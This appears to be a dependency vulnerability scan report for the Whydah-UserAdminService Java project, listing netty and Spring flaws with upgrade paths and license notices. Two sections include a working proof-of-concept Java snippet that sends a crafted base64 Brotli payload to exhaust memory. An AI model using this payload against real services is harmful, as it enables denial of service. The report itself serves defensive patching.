Vulnerabilities

 5 via 27 paths

Dependencies

 139

Source

 GitHub

Commit

 670a4176

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Issue type
  • 5
  • 3
Severity
  • 5
  • 3
Status
  • 8
  • 0
  • 0

high severity
new

HTTP Request Smuggling

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling via the parsing of chunk extensions in HTTP/1.1 messages with chunked encoding. An attacker can bypass HTTP request boundaries by sending specially crafted HTTP requests that exploit differences in how standalone newline characters are parsed between reverse proxies and the backend, potentially allowing them to smuggle additional requests.

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final, 4.2.5.Final or higher.

References

HTTP Request Smuggling vulnerability report

high severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final or higher.

References

Improper Handling of Highly Compressed Data (Data Amplification) vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: io.netty:netty-codec-http2
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final

Overview

io.netty:netty-codec-http2 is a HTTP2 sub package for the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the improper handling of concurrently active streams per connection. An attacker can cause resource exhaustion and disrupt service availability by rapidly sending crafted frames, such as WINDOW_UPDATE, HEADERS, or PRIORITY, that manipulate the server's stream reset logic, leading to unbounded concurrent stream processing.

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.124.Final, 4.2.4.Final or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: io.netty:netty-codec-http2
  • Introduced through: com.azure:azure-identity@1.17.0

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
    Remediation: Upgrade to com.azure:azure-identity@1.18.0.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d com.azure:azure-identity@1.17.0 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final

Overview

io.netty:netty-codec-http2 is a HTTP2 sub package for the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.125.Final or higher.

References

Improper Handling of Highly Compressed Data (Data Amplification) vulnerability report

high severity
new

Incorrect Authorization

  • Vulnerable module: org.springframework:spring-core
  • Introduced through: org.springframework:spring-core@6.2.10, org.springframework:spring-beans@6.2.10 and others

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-core@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-beans@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-aop@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-web@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-web@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-aop@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-web@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-web@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-aop@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-expression@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.
  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.springframework:spring-context@6.2.10 org.springframework:spring-aop@6.2.10 org.springframework:spring-beans@6.2.10 org.springframework:spring-core@6.2.10
    Remediation: Upgrade to org.springframework:spring-context@6.2.11.

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Incorrect Authorization via the AnnotationsScanner and AnnotatedMethod class. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.

Note: This is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the @EnableMethodSecurity feature is enabled.

Remediation

Upgrade org.springframework:spring-core to version 6.2.11 or higher.

References

Incorrect Authorization vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-classic
  • Introduced through: ch.qos.logback:logback-classic@1.5.18

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d ch.qos.logback:logback-classic@1.5.18

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

  • Module: ch.qos.logback:logback-core
  • Introduced through: ch.qos.logback:logback-classic@1.5.18

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d ch.qos.logback:logback-classic@1.5.18 ch.qos.logback:logback-core@1.5.18

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report

medium severity

LGPL-3.0 license

  • Module: org.jboss.logging:jboss-logging-processor
  • Introduced through: org.jboss.weld.se:weld-se-core@5.1.5.Final

Detailed paths

  • Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#670a41760c3234d1381370a0ad05acfa922a785d org.jboss.weld.se:weld-se-core@5.1.5.Final org.jboss.weld:weld-lite-extension-translator@5.1.5.Final org.jboss.logging:jboss-logging-processor@2.2.1.Final

LGPL-3.0 license

LGPL-3.0 license vulnerability report